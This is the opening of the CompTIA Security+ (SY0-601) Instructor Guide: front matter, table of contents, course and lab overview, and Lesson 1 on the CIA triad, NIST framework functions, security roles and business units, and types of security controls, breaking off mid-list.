
The Official

CompTIA
Security+
Instructor Guide
(Exam SY0-601)
Course Edition: 1.0

Acknowledgments

James Pengelly, Author


Thomas Reilly, Vice President, Learning
Katie Hoenicke, Director of Product Management
Evan Burns, Senior Manager, Learning Technology Operations and Implementation
James Chesterfield, Manager, Learning Content and Design
Becky Mann, Senior Manager, Product Development
Katherine Keyes, Content Specialist

Notices
Disclaimer
While CompTIA, Inc., takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy,
and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of
merchantability or fitness for a particular purpose. The use of screenshots, photographs of another entity's products, or
another entity's product name or service in this book is for editorial purposes only. No such use should be construed to imply
sponsorship or endorsement of the book by nor any affiliation of such entity with CompTIA. This courseware may contain links
to sites on the Internet that are owned and operated by third parties (the "External Sites"). CompTIA is not responsible for
the availability of, or the content located on or through, any External Site. Please contact CompTIA if you have any concerns
regarding such links or External Sites.

Trademark Notice
CompTIA®, Security+®, and the CompTIA logo are registered trademarks of CompTIA, Inc., in the U.S. and other countries.
All other product and service names used may be common law or registered trademarks of their respective proprietors.

Copyright Notice
Copyright © 2020 CompTIA, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software
proprietor. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed
in any form or by any means, or stored in a database or retrieval system, without the prior written permission of CompTIA,
3500 Lacey Road, Suite 100, Downers Grove, IL 60515-5439.
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software
or other products is the responsibility of the user according to terms and conditions of the owner. If you believe that this
book, related materials, or any other CompTIA materials are being reproduced or transmitted without permission, please call
1-866-835-8020 or visit https://help.comptia.org.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Table of Contents | iii

Table of Contents

Lesson 1: Comparing Security Roles and Security Controls........................................ 1

Topic 1A: Compare and Contrast Information Security Roles .......................... 2

Topic 1B: Compare and Contrast Security Control and Framework Types ..... 8

Lesson 2: Explaining Threat Actors and Threat Intelligence .................................... 17

Topic 2A: Explain Threat Actor Types and Attack Vectors .............................. 18

Topic 2B: Explain Threat Intelligence Sources .................................................. 25

Lesson 3: Performing Security Assessments .............................................................. 35

Topic 3A: Assess Organizational Security with Network Reconnaissance Tools ..... 36

Topic 3B: Explain Security Concerns with General Vulnerability Types ........ 50

Topic 3C: Summarize Vulnerability Scanning Techniques .............................. 57

Topic 3D: Explain Penetration Testing Concepts.............................................. 67

Lesson 4: Identifying Social Engineering and Malware ............................................. 73

Topic 4A: Compare and Contrast Social Engineering Techniques .................. 74

Topic 4B: Analyze Indicators of Malware-Based Attacks ................................ 82

Lesson 5: Summarizing Basic Cryptographic Concepts ............................................. 95

Topic 5A: Compare and Contrast Cryptographic Ciphers ................................ 96

Topic 5B: Summarize Cryptographic Modes of Operation ............................ 104

Topic 5C: Summarize Cryptographic Use Cases and Weaknesses ................ 111

Topic 5D: Summarize Other Cryptographic Technologies............................. 120

Lesson 6: Implementing Public Key Infrastructure ................................................. 125

Topic 6A: Implement Certificates and Certificate Authorities ..................... 126

Topic 6B: Implement PKI Management ........................................................... 137


Lesson 7: Implementing Authentication Controls ................................................... 147

Topic 7A: Summarize Authentication Design Concepts ................................ 148

Topic 7B: Implement Knowledge-Based Authentication............................... 154

Topic 7C: Implement Authentication Technologies ....................................... 164

Topic 7D: Summarize Biometrics Authentication Concepts ......................... 172

Lesson 8: Implementing Identity and Account Management Controls................. 179

Topic 8A: Implement Identity and Account Types ......................................... 180

Topic 8B: Implement Account Policies ............................................................ 191

Topic 8C: Implement Authorization Solutions................................................ 199

Topic 8D: Explain the Importance of Personnel Policies ............................... 208

Lesson 9: Implementing Secure Network Designs................................................... 215

Topic 9A: Implement Secure Network Designs .............................................. 216

Topic 9B: Implement Secure Switching and Routing ..................................... 227

Topic 9C: Implement Secure Wireless Infrastructure .................................... 235

Topic 9D: Implement Load Balancers .............................................................. 247

Lesson 10: Implementing Network Security Appliances......................................... 255

Topic 10A: Implement Firewalls and Proxy Servers ....................................... 256

Topic 10B: Implement Network Security Monitoring .................................... 268

Topic 10C: Summarize the Use of SIEM ............................................................ 275

Lesson 11: Implementing Secure Network Protocols .............................................. 283

Topic 11A: Implement Secure Network Operations Protocols ..................... 284

Topic 11B: Implement Secure Application Protocols ..................................... 292

Topic 11C: Implement Secure Remote Access Protocols ............................... 301

Lesson 12: Implementing Host Security Solutions................................................... 317

Topic 12A: Implement Secure Firmware ......................................................... 318

Topic 12B: Implement Endpoint Security ........................................................ 325

Topic 12C: Explain Embedded System Security Implications ........................ 331


Lesson 13: Implementing Secure Mobile Solutions ................................................. 343

Topic 13A: Implement Mobile Device Management ...................................... 344

Topic 13B: Implement Secure Mobile Device Connections ........................... 356

Lesson 14: Summarizing Secure Application Concepts ........................................... 365

Topic 14A: Analyze Indicators of Application Attacks ................................... 366

Topic 14B: Analyze Indicators of Web Application Attacks ........................... 372

Topic 14C: Summarize Secure Coding Practices ............................................. 383

Topic 14D: Implement Secure Script Environments ...................................... 390

Topic 14E: Summarize Deployment and Automation Concepts ................... 399

Lesson 15: Implementing Secure Cloud Solutions ................................................... 407

Topic 15A: Summarize Secure Cloud and Virtualization Services ................ 408

Topic 15B: Apply Cloud Security Solutions ...................................................... 418

Topic 15C: Summarize Infrastructure as Code Concepts .............................. 429

Lesson 16: Explaining Data Privacy and Protection Concepts ................................ 437

Topic 16A: Explain Privacy and Data Sensitivity Concepts............................ 438

Topic 16B: Explain Privacy and Data Protection Controls ............................. 447

Lesson 17: Performing Incident Response ................................................................ 455

Topic 17A: Summarize Incident Response Procedures .................................. 456

Topic 17B: Utilize Appropriate Data Sources for Incident Response ........... 465

Topic 17C: Apply Mitigation Controls............................................................... 475

Lesson 18: Explaining Digital Forensics ..................................................................... 483

Topic 18A: Explain Key Aspects of Digital Forensics Documentation .......... 484

Topic 18B: Explain Key Aspects of Digital Forensics Evidence Acquisition .... 490

Lesson 19: Summarizing Risk Management Concepts ............................................ 499

Topic 19A: Explain Risk Management Processes and Concepts ................... 500

Topic 19B: Explain Business Impact Analysis Concepts................................. 508


Lesson 20: Implementing Cybersecurity Resilience ................................................ 515

Topic 20A: Implement Redundancy Strategies............................................... 516

Topic 20B: Implement Backup Strategies ....................................................... 522

Topic 20C: Implement Cybersecurity Resiliency Strategies .......................... 530

Lesson 21: Explaining Physical Security .................................................................... 539

Topic 21A: Explain the Importance of Physical Site Security Controls ........ 540

Topic 21B: Explain the Importance of Physical Host Security Controls....... 548

Appendix A: Mapping Course Content to CompTIA Security+ (Exam SY0-601) ......A-1

Glossary..........................................................................................................................G-1

Index ................................................................................................................................ I-1

Using The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
WELCOME TO THE INSTRUCTOR
The Official CompTIA Security+ Instructor and Student Guides (Exam SY0-601) have
been developed by CompTIA for the CompTIA certification candidate. Rigorously
evaluated by third-party subject matter experts to validate adequate coverage of the
Security+ exam objectives, The Official CompTIA Security+ Instructor and Student Guides
teach students the knowledge and skills required to assess the security posture of
an enterprise environment and recommend and implement appropriate security
solutions; monitor and secure hybrid environments, including cloud, mobile, and IoT;
operate with an awareness of applicable laws and policies, including principles of
governance, risk, and compliance; identify, analyze, and respond to security events and
incidents; and prepare candidates to take the CompTIA Security+ certification exam.
The Official CompTIA Security+ Guides are created around several core principles,
including:
• Support the Modern Learner: The Official CompTIA Security+ Guides are
designed with the modern student and classroom in mind, ensuring success
whether the course format is co-located or remote, synchronous or asynchronous,
continuous or modular. Instructors will find best practices and recommendations
within the margin of their Instructor Guide specific to the various course formats.

• Focused on Job Roles and Objectives: Official CompTIA Guides are organized
into Courses, Lessons, and Topics that align training to work in the real world. At the
course level, the content reflects a real job role, guided by the objectives and content
examples in the CompTIA Exam Objectives document. Lessons refer to functional
areas within that job role. Topics within each lesson relate to discrete job tasks.

• Sound Instructional Design: The content within Topics is presented in an
instructional hierarchy that thoughtfully offers knowledge, procedural tasks, and
hands-on Activities that require that students put the knowledge they have gained
into practice. This approach keeps the student engaged, ensures success with the
learning outcomes, and reinforces the core concepts to ensure long-term retention
of new ideas.

Preparing to Teach
The course covers the following themes:
• Threat intelligence and security assessment (Lessons ...).

• Cryptography and IAM (Lessons ...).

• Protecting network infrastructure (Lessons ...).

• Protecting applications and cloud services (Lessons ...).

• Incident response and risk management (Lessons ...).

In addition, incident response has been expanded and moved toward the end of the
course, and physical site security is now covered at the end of the course.


Easily Implemented in Classroom Environments
The content and resources in the Security+ course have been reworked to
make them more flexible to suit a variety of classroom formats, whether there are
days or weeks to teach the material:
• Lengthy on-premise Lab Activities that require organizations to set up and
maintain equipment have been removed from the course. Instead, graded labs
(CertMaster Labs) are available hosted on the Learn on Demand Systems platform.
These modular labs require only a modern browser and internet connection, saving
organizations hours of setup time. Their short durations of ... minutes allow
for labs to be more easily integrated in coursework. As a result, instructors will no
longer see the setup guide in the Instructor Resources.

• Reworked Presentation Tools: The number of PowerPoint lecture slides has been
vastly reduced as compared with ..., while supporting PowerPoint notes and
Presentation Planners have been enhanced, making it easier for instructors to plan
lectures and use classroom time effectively.

Resources for Teaching
The CompTIA Learning Center is an intuitive online platform that provides access to the
eBook and all accompanying resources to support The Official CompTIA curriculum. An
access key to the CompTIA Learning Center is delivered upon purchase of the print or
eBook.
• Instructor Tips: Throughout the Instructor Guide, you will see in the margins
various instructor-focused icons that provide suggestions, answers to problems, and
supplemental information for you, the instructor. The text under these icons is not
included in the Student Guide. These notes are also included in the notes section of
the instructor PowerPoint deck for easy reference while teaching.

• Resources: Supporting materials for instructors are available for downloading from
the Resources menu. In addition to course-specific delivery tips, and solutions to
activities and discussion questions, instructors also have access to:

• PowerPoint Slides: A complete set of PowerPoint slides is provided to facilitate
the class, including lists, tables, diagrams, illustrations, and annotated screens, as
well as Activity summaries.

• Presentation Planners: Several Presentation Planners are provided in the
Resources menu. The Planners help the instructor plan the class schedule and
include examples of schedules for different course lengths, whether courses are
continuous or offered separately across a multisession series.

• Transition Guide: A detailed guide with information on how the exam objectives
and training content have changed from ... to ....

• Videos: Videos complement the reading by providing short, engaging
demonstrations of key activities in the course.

• Assessments: Practice questions help to verify a student's understanding of
the material for each Lesson. Answers and feedback can be reviewed after each
question, or at the end of the assessment. A timed Final Assessment provides a
practice test-like experience to help students determine their readiness for the
CompTIA certification exam. Students can review correct answers and full feedback
after attempting the Final Assessment.

The CompTIA Learning Center can be accessed at learn.comptia.org.

The margin icons used throughout this Instructor Guide are:

Teaching Tip: A Teaching Tip icon provides additional guidance and background that you
may want to utilize during specific parts of the course, including timings and emphasis.

Interaction Opportunity: An Interaction Opportunity provides suggestions for different
ways to engage with students, either through discussions, activities, or demonstrations.

Show Slide(s): The Show Slide icon provides a prompt to display a specific slide from the
provided PowerPoint files.


CertMaster Labs
CertMaster Labs allow students to learn in actual software applications through a
remote lab environment. The labs align with The Official CompTIA Instructor and Student
Guides and allow students to practice what they are learning using real, hands-on
experiences. All lab activities include gradable assessments, offer feedback and hints,
and provide a score based on learner inputs. Students have access to the software
environment for ... months after they redeem their access key, providing a fantastic
resource for students to practice their skills. Features of CertMaster Labs include:
• Browser-based: The labs can be accessed with a browser and internet connection,
making the setup process easy and enabling remote students to use the materials
without having to secure any special equipment or software.

• Use Real Equipment and Software: The labs use virtual machines configured
with actual software applications and operating systems, allowing for flexibility in
approaching the lab tasks and replicating the experience students will encounter in
a job role.

• Graded Labs: Lab activities will more accurately assess a student's ability to
perform tasks because they will get a score on their work and will surface that
information to instructors.

• Modular: The labs within each course are independent of each other and can be
used in any order.

• Designed for Skills Development: The labs help students gain experience
with the practical tasks that will be expected of them in a job role and on the
performance-based items found on CompTIA certification exams.

• Aligned with Official CompTIA Content: The labs are based on the content within
The Official CompTIA Instructor and Student Guides, providing a consistent and
seamless experience for students to both gain knowledge and practice skills.

• Ability to Save Work: Students can save their work in labs for ... hours to allow
for more flexibility in how labs are implemented in coursework.

Lab Activities
Hands-on activities have been redesigned to take advantage of the virtual environment.
All lab activities include gradable assessments, offer feedback and hints, and provide a
score based on learner inputs. There are two types of labs:
• Assisted Labs provide detailed steps with graded assessment and feedback for the
completion of each task. These labs are shorter, focus on a specific task, and typically
take ... minutes to complete.

• Applied Labs are longer activities that provide a series of goal-oriented scenarios
with graded assessment and feedback based on a learner's ability to complete each
goal successfully. Applied labs are typically ... minutes long and cover multiple
tasks a student has learned over the course of several lessons.

Find more information about CertMaster Labs and how to purchase them at
store.comptia.org.

Presentation Planners
Within the instructional design hierarchy, the course structure tries to follow the
exam objectives' domain structure as far as possible, but some objectives and content
examples are split between multiple lessons and topics so as to make the topics flow


better and to eliminate duplications. The course is designed to be as modular as
possible, so that you can use the content as flexibly as you wish.
Presentation planners are available to download from the CompTIA Learning Center
on the Resources page. Because the content can be presented in a continuous flow
or separately across a multisession series, several sample timetables are provided.
You can use these sample planners to determine how you will conduct the class to
meet the needs of your own situation. A presentation planner helps you to structure
the course by indicating the maximum amount of time you should spend on any one
topic or activity. You will need to adjust these timings to suit your audience. Your
presentation timing and flow may vary based on factors such as the size of the class,
whether students are in specialized job roles, whether you plan to incorporate videos
or other assets from the CompTIA Learning Center into the course, and so on.
With the latest revision of the certification exams and corresponding exam objectives,
a significant amount of new content has been added to this edition of the course. You
might need to employ time-saving techniques. Detailed notes are provided as Teaching
Tips at the start of each lesson and topic, but consider the following general
time-saving strategies:
• Some topics will require more detailed presentation, with use of the slide deck.
Others, such as those that are well covered by prerequisite certifications, would
suit a less formal style where you use questioning and lead a discussion to check
students' existing understanding. Some topics may be suitable for self-study, but
if students have concerns about this, you will have to reduce the amount of lab
activities to compensate.

• Ask participants to preread some of the content as homework to reduce class time
spent on that topic.

• Summarize a topic in overview, and then answer questions during a later session
when students have had a chance to study it in more detail.

• Consider a lab-first approach to selected topics, referring students to the study
content for review later.

If students are struggling with lab activities, consider some of the following approaches:
• Demonstrate a lab as a walkthrough.

• Get students to partner up to complete a lab, with one student completing the steps
and the other student advising and checking.

• Summarize the remaining parts of a lab if students do not have time to finish in
class.

About This Course
CompTIA is a not-for-profit trade association with the purpose of advancing the
interests of IT professionals and IT channel organizations, and its industry-leading IT
certifications are an important part of that mission. CompTIA's Security+ certification is
a foundation-level certificate designed for IT administrators with two years' experience
whose job role is focused on system security.
The CompTIA Security+ exam will certify the successful candidate has the knowledge
and skills required to assist with cybersecurity duties in small and large organizations.
These duties include assessments and monitoring; secure network, host, app, and
cloud provisioning; data governance; and incident analysis and response.

Teaching Tip: Take some time at the start of the course for students to introduce
themselves and identify the outcomes they hope to achieve by studying the course.

CompTIA Security+ is the first security certification IT professionals should earn. It
establishes the core knowledge required of any cybersecurity role and provides a
springboard to intermediate-level cybersecurity jobs. Security+ incorporates best
practices in hands-on troubleshooting to ensure security professionals have practical
security problem-solving skills. Cybersecurity professionals with Security+ know how to
address security incidents, not just identify them.
Security+ is compliant with ISO 17024 standards and approved by the US DoD to meet
directive 8140/8570.01-M requirements. Regulators and government rely on ANSI
accreditation because it provides confidence and trust in the outputs of an accredited
program.
comptia.org/certifications/security

Course Description
Course Objectives
This course can benefit you in two ways. If you intend to pass the CompTIA Security+
(Exam SY0-601) certification examination, this course can be a significant part of your
preparation. But certification is not the only key to professional success in the field of
computer security. Today's job market demands individuals with demonstrable skills,
and the information and activities in this course can help you build your cybersecurity
skill set so that you can confidently perform your duties in any entry-level security role.
On course completion, you will be able to:
• Compare security roles and security controls

• Explain threat actors and threat intelligence

• Perform security assessments and identify social engineering attacks and malware
types

• Summarize basic cryptographic concepts and implement public key infrastructure

• Implement authentication controls

• Implement identity and account management controls

• Implement secure network designs, network security appliances, and secure
network protocols

• Implement host, embedded/Internet of Things, and mobile security solutions

• Implement secure cloud solutions


• Explain data privacy and protection concepts

• Perform incident response and digital forensics

• Summarize risk management concepts and implement cybersecurity resilience

• Explain physical security

Target Student
The Official CompTIA Security+ Guide (Exam SY0-601) is the primary course you will need
to take if your job responsibilities include securing network services, devices, and data
confidentiality/privacy in your organization. You can take this course to prepare for the
CompTIA Security+ (Exam SY0-601) certification examination.

Prerequisites
• To ensure your success in this course, you should have basic Windows and Linux
administrator skills and the ability to implement fundamental networking appliances
and IP addressing concepts. CompTIA A+ and Network+ certifications, or equivalent
knowledge, and six to nine months' experience in networking, including configuring
security parameters, are strongly recommended.

The prerequisites for this course might differ significantly from the prerequisites for
the CompTIA certification exams. For the most up-to-date information about the exam
prerequisites, complete the form on this page: comptia.org/training/resources/exam-objectives

How to Use the Study Notes
The following notes will help you understand how the course structure and
components are designed to support mastery of the competencies and tasks
associated with the target job roles and help you to prepare to take the certification
exam.

As You Learn
At the top level, this course is divided into lessons, each representing an area of
competency within the target job roles. Each lesson is composed of a number of topics.
A topic contains subjects that are related to a discrete job task, mapped to objectives
and content examples in the CompTIA exam objectives document. Rather than follow
the exam domains and objectives sequence, lessons and topics are arranged in order
of increasing proficiency. Each topic is intended to be studied within a short period
(typically ... minutes at most). Each topic is concluded by one or more activities,
designed to help you to apply your understanding of the study notes to practical
scenarios and tasks.
Additional to the study content in the lessons, there is a glossary of the terms and
concepts used throughout the course. There is also an index to assist in locating
particular terminology, concepts, technologies, and tasks within the lesson and topic
content.

In many electronic versions of the book, you can click links on key words in the topic content
to move to the associated glossary definition, and on page references in the index to move
to that term in the content. To return to the previous location in the document after clicking
a link, use the appropriate functionality in your eBook viewing software.


Watch throughout the material for the following visual cues.

Student Icon / Descriptive Text

• Note: A Note provides additional information, guidance, or hints about a topic or task.

• Caution: A Caution note makes you aware of places where you need to be particularly
careful with your actions, settings, or decisions so that you can be sure to get the
desired results of an activity or task.

As You Review
Any method of instruction is only as effective as the time and effort you, the student,
are willing to invest in it. In addition, some of the information that you learn in class
may not be important to you immediately, but it may become important later. For this
reason, we encourage you to spend some time reviewing the content of the course
after your time in the classroom.
Following the lesson content, you will find a table mapping the lessons and topics to
the exam domains, objectives, and content examples. You can use this as a checklist as
you prepare to take the exam, and review any content that you are uncertain about.

As a Reference
The organization and layout of this book make it an easy-to-use resource for future
reference. Guidelines can be used during class and as after-class references when
you're back on the job and need to refresh your understanding. Taking advantage of
the glossary, index, and table of contents, you can use this book as a first source of
definitions, background information, and summaries.

How to Use the CompTIA Learning Center
The CompTIA Learning Center is an intuitive online platform that provides access to the
eBook and all accompanying resources to support The Official CompTIA curriculum. An
access key to the CompTIA Learning Center is delivered upon purchase of the eBook.
Resources include:
• Online Reader: An interactive online reader provides the ability to search, highlight,
take notes, and bookmark passages in the eBook. Students can also access the
eBook through the CompTIA Learning Center eReader mobile app.

• Videos: Videos complement the reading by providing short, engaging
demonstrations of key activities in the course.

• Assessments: Practice questions help to verify a student's understanding of
the material for each Lesson. Answers and feedback can be reviewed after each
question, or at the end of the assessment. A timed Final Assessment provides a
practice test-like experience to help students determine their readiness for the
CompTIA certification exam. Students can review correct answers and full feedback
after attempting the Final Assessment.

• Strengths and Weaknesses Dashboard: The Strengths and Weaknesses
Dashboard provides you with a snapshot of your performance. Data flows into
the dashboard from your practice questions, final assessment scores, and your
indicated confidence levels throughout the course.

The CompTIA Learning Center can be accessed at learn.comptia.org.

About This Course

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 1
Comparing Security Roles and Security Controls

LESSON INTRODUCTION
Security is an ongoing process that includes assessing requirements, setting up organizational security systems, hardening them, monitoring them, responding to attacks in progress, and deterring attackers. As a security professional, it is important that you understand how the security function is implemented as departments or units and professional roles within different types of organizations. You must also be able to explain the importance of compliance factors and best practice frameworks in driving the selection of security controls.

Teaching Tip
This lesson aims to establish the context for the security role and introduce the concepts of security controls and frameworks.

Lesson Objectives
In this lesson, you will:
• Compare and contrast information security roles.
• Compare and contrast security control and framework types.

2 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 1A
Compare and Contrast Information Security Roles

EXAM OBJECTIVES COVERED
This topic provides background information about the role of security professionals and does not cover a specific exam objective.

Teaching Tip
This topic introduces the concept of the CIA triad and discusses roles and responsibilities in typical information security teams. This topic does not align to specific objectives, but it does cover some terminology from the acronyms list. You can skip this topic if students are familiar with these basic concepts and terminology and you would prefer to move quickly to covering syllabus content.

To be successful and credible as a security professional, you should understand security in business starting from the ground up. You should also know the key security terms and ideas used by other security experts in technical documents and in trade publications. Security implementations are constructed from fundamental building blocks, just like a large building is constructed from individual bricks. This topic will help you understand those building blocks so that you can use them as the foundation for your security career.

Show Slide(s): Information Security

Information Security
Information security (or infosec) refers to the protection of data resources from unauthorized access, attack, theft, or damage. Data may be vulnerable because of the way it is stored, the way it is transferred, or the way it is processed. The systems used to store, transmit, and process data must demonstrate the properties of security. Secure information has three properties, often referred to as the CIA Triad:
• Confidentiality means that certain information should only be known to certain people.
• Integrity means that the data is stored and transferred as intended and that any modification is authorized.
• Availability means that information is accessible to those authorized to view or modify it.

The triad can also be referred to as "AIC" to avoid confusion with the Central Intelligence Agency.

Some security models and researchers identify other properties that secure systems should exhibit. The most important of these is non-repudiation. Non-repudiation means that a subject cannot deny doing something, such as creating, modifying, or sending a resource. For example, a legal document, such as a will, must usually be witnessed when it is signed. If there is a dispute about whether the document was correctly executed, the witness can provide evidence that it was.

Teaching Tip
Make sure that students can differentiate the goals of providing confidentiality, integrity, and availability (and non-repudiation). Note that the property of availability should not be overlooked. An alternative acronym is PAIN (Privacy, Authentication, Integrity, Non-Repudiation). We will discuss security versus privacy later in the course.

Lesson 1: Comparing Security Roles and Security Controls | Topic 1A


Show Slide(s): Cybersecurity Framework

Cybersecurity Framework
Within the goal of ensuring information security, cybersecurity refers specifically to provisioning secure processing hardware and software. Information security and cybersecurity tasks can be classified as five functions, following the framework developed by the National Institute of Standards and Technology (NIST) (nist.gov/cyberframework/online-learning/five-functions):
• Identify—develop security policies and capabilities. Evaluate risks, threats, and vulnerabilities and recommend security controls to mitigate them.
• Protect—procure/develop, install, operate, and decommission IT hardware and software assets with security as an embedded requirement of every stage of this operations life cycle.
• Detect—perform ongoing, proactive monitoring to ensure that controls are effective and capable of protecting against new types of threats.
• Respond—identify, analyze, contain, and eradicate threats to systems and data security.
• Recover—implement cybersecurity resilience to restore systems and data if other controls are unable to prevent attacks.

Core cybersecurity tasks.

Teaching Tip
Use these functions to give students an overview of typical cybersecurity operations. Make sure students are familiar with the work of NIST. Note also that links in the course will often include sites and white papers with considerable amounts of additional detail. This detail is not necessary to learn for the exam.
Start to develop the idea that cybersecurity is adversarial in nature, with threat actors continually seeking new advantages over defensive systems.


Show Slide(s): Information Security Competencies

Information Security Competencies
IT professionals working in a role with security responsibilities must be competent in a wide range of disciplines, from network and application design to procurement and human resources. The following activities might be typical of such a role:
• Participate in risk assessments and testing of security systems and make recommendations.
• Specify, source, install, and configure secure devices and software.
• Set up and maintain document access control and user privilege profiles.
• Monitor audit logs, review user privileges, and document access controls.
• Manage security-related incident response and reporting.
• Create and test business continuity and disaster recovery plans and procedures.
• Participate in security training and education programs.

Interaction Opportunity
If appropriate, ask students what security-relevant duties they have in their current employment.

Show Slide(s): Information Security Roles and Responsibilities

Information Security Roles and Responsibilities
A security policy is a formalized statement that defines how security will be implemented within an organization. It describes the means the organization will take to protect the confidentiality, availability, and integrity of sensitive data and resources. It often consists of multiple individual policies. The implementation of a security policy to support the goals of the CIA triad might be very different for a school, a multinational accountancy firm, or a machine tool manufacturer. However, each of these organizations, or any other organization (in any sector of the economy, whether profit-making or non-profit-making), should have the same interest in ensuring that its employees, equipment, and data are secure against attack or damage.

As part of the process of adopting an effective organizational security posture, employees must be aware of their responsibilities. The structure of security responsibilities will depend on the size and hierarchy of an organization, but these roles are typical:
• Overall internal responsibility for security might be allocated to a dedicated department, run by a Director of Security, Chief Security Officer (CSO), or Chief Information Security Officer (CISO). Historically, responsibility for security might have been allocated to an existing business unit, such as Information and Communications Technology (ICT) or accounting.

However, the goals of a network manager are not always well aligned with the goals of security; network management focuses on availability over confidentiality. Consequently, security is increasingly thought of as a dedicated function or business unit with its own management structure.

• Managers may have responsibility for a domain, such as building control, ICT, or accounting.
• Technical and specialist staff have responsibility for implementing, maintaining, and monitoring the policy. Security might be made a core competency of systems and network administrators, or there may be dedicated security administrators. One such job title is Information Systems Security Officer (ISSO).
• Non-technical staff have the responsibility of complying with policy and with any relevant legislation.
• External responsibility for security (due care or liability) lies mainly with directors or owners, though again it is important to note that all employees share some measure of responsibility.

NIST's National Initiative for Cybersecurity Education (NICE) categorizes job tasks and job roles within the cybersecurity industry (nist.gov/itl/applied-cybersecurity/nice/nice-framework-resource-center).

Interaction Opportunity
Discuss how responsibility for security might need to be clarified when there is a specialist security function combining with the responsibilities of different department managers.


Show Slide(s): Information Security Business Units

Information Security Business Units
The following units are often used to represent the security function within the organizational hierarchy.

Security Operations Center (SOC)
A security operations center (SOC) is a location where security professionals monitor and protect critical information assets across other business functions, such as finance, operations, sales/marketing, and so on. Because SOCs can be difficult to establish, maintain, and finance, they are usually employed by larger corporations, like a government agency or a healthcare company.

IBM Security Headquarters in Cambridge, MA. (Image credit: John Mattern/Feature Photo Service for IBM.)

Teaching Tip
Students should learn this terminology, drawn from the acronym list. Note the advice in the syllabus document: "Candidates are encouraged to review the complete list and attain a working knowledge of all listed acronyms as part of a comprehensive exam preparation program."

Interaction Opportunity
If appropriate, discuss how the security function is represented in the students' workplaces. Do any students currently work in a SOC or participate in DevSecOps projects?

DevSecOps
Network operations and use of cloud computing make ever-increasing use of automation through software code. Traditionally, software code would be the responsibility of a programming or development team. Separate development and operations departments or teams can lead to silos, where each team does not work effectively with the other.
Development and operations (DevOps) is a cultural shift within an organization to encourage much more collaboration between developers and system administrators. By creating a highly orchestrated environment, IT personnel and developers can build, test, and release software faster and more reliably. Many consider a DevOps approach to administration as the only way organizations can take full advantage of the potential benefits offered by cloud service providers.

DevSecOps extends the boundary to security specialists and personnel, reflecting the principle that security is a primary consideration at every stage of software development and deployment. This is also known as shift left, meaning that security considerations need to be made during requirements and planning phases, not grafted on at the end. The principle of DevSecOps recognizes this and shows that security expertise must be embedded into any development project. Ancillary to this is the recognition that security operations can be conceived of as software development projects. Security tools can be automated through code. Consequently, security operations need to take on developer expertise to improve detection and monitoring.

Incident Response
A dedicated cyber incident response team (CIRT)/computer security incident response team (CSIRT)/computer emergency response team (CERT) acts as a single point of contact for the notification of security incidents. This function might be handled by the SOC or it might be established as an independent business unit.


Review Activity:
Information Security Roles
Answer the following questions:

1. What are the properties of a secure information processing system?

Confidentiality, Integrity, and Availability (and Non-repudiation).

2. What term is used to describe the property of a secure network where a sender cannot deny having sent a message?

Non-repudiation.

3. A multinational company manages a large amount of valuable intellectual property (IP) data, plus personal data for its customers and account holders. What type of business unit can be used to manage such important and complex security requirements?

A security operations center (SOC).

4. A business is expanding rapidly and the owner is worried about tensions between its established IT and programming divisions. What type of security business unit or function could help to resolve these issues?

Development and operations (DevOps) is a cultural shift within an organization to encourage much more collaboration between developers and system administrators. DevSecOps embeds the security function within these teams as well.

Teaching Tip
You can either complete the review questions in class with the students or simply make them aware of them as resources to use as they review the course material before the exam.


Topic 1B
Compare and Contrast Security Control and Framework Types

EXAM OBJECTIVES COVERED
5.1 Compare and contrast various types of controls
5.2 Explain the importance of applicable regulations, standards, or frameworks that impact organizational security posture

Teaching Tip
This is an important subject; students need to be able to distinguish between types of security controls. They will also often have to work within the compliance requirements of legislation, regulation, and frameworks.

Information security and cybersecurity assurance is met by implementing security controls. As an information security professional, you must be able to compare types of security controls. You should also be able to describe how frameworks influence the selection and configuration of controls. By identifying basic security control types and how key frameworks and legislation drive compliance, you will be better prepared to select and implement the most appropriate controls for a given scenario.

Show Slide(s): Security Control Categories

Security Control Categories
Information and cybersecurity assurance is usually considered to take place within an overall process of business risk management. Implementation of cybersecurity functions is often the responsibility of the IT department. There are many different ways of thinking about how IT services should be governed to fulfill overall business needs. Some organizations have developed IT service frameworks to provide best practice guides to implementing IT and cybersecurity. These frameworks can shape company policies and provide checklists of procedures, activities, and technologies that should ideally be in place. Collectively, these procedures, activities, and tools can be referred to as security controls.

A security control is something designed to give a system or data asset the properties of confidentiality, integrity, availability, and non-repudiation. Controls can be divided into three broad categories, representing the way the control is implemented:
• Technical—the control is implemented as a system (hardware, software, or firmware). For example, firewalls, anti-virus software, and access control models are technical controls. Technical controls may also be described as logical controls.
• Operational—the control is implemented primarily by people rather than systems. For example, security guards and training programs are operational controls rather than technical controls.
• Managerial—the control gives oversight of the information system. Examples could include risk identification or a tool allowing the evaluation and selection of other security controls.

Teaching Tip
Explain that a control category describes how it is implemented. For example, a document access policy is managerial, checking that permissions are applied according to the policy is operational, and the file system permissions are technical in nature. As with all classification systems, there is some degree of overlap, but the classification process is designed to help assess capabilities compared to frameworks and best practice guides.


Categories of security controls.

Although it uses a more complex scheme, it is worth being aware of the way the National Institute of Standards and Technology (NIST) classifies security controls (nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800- r .pdf).

Show Slide(s): Security Control Functional Types (2)

Security Control Functional Types
Security controls can also be classified in types according to the goal or function they perform:
• Preventive—the control acts to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place. Access control lists (ACL) configured on firewalls and file system objects are preventative-type controls. Anti-malware software also acts as a preventative control, by blocking processes identified as malicious from executing. Directives and standard operating procedures (SOPs) can be thought of as administrative versions of preventative controls.
• Detective—the control may not prevent or deter access, but it will identify and record any attempted or successful intrusion. A detective control operates during the progress of an attack. Logs provide one of the best examples of detective-type controls.
• Corrective—the control acts to eliminate or reduce the impact of an intrusion event. A corrective control is used after an attack. A good example is a backup system that can restore data that was damaged during an intrusion. Another example is a patch management system that acts to eliminate the vulnerability exploited during the attack.

While most controls can be classed functionally as preventative, detective, or corrective, a few other types can be used to define other cases:
